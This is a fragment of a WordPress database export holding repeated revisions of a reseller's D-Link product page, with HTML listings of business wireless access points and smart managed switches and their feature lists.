255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:26:40','2019-09-25 06:26:40','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3395,1,'2019-09-25 14:27:12','2019-09-25 06:27:12','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:27:12','2019-09-25 06:27:12','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3396,1,'2019-09-25 14:27:42','2019-09-25 06:27:42','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			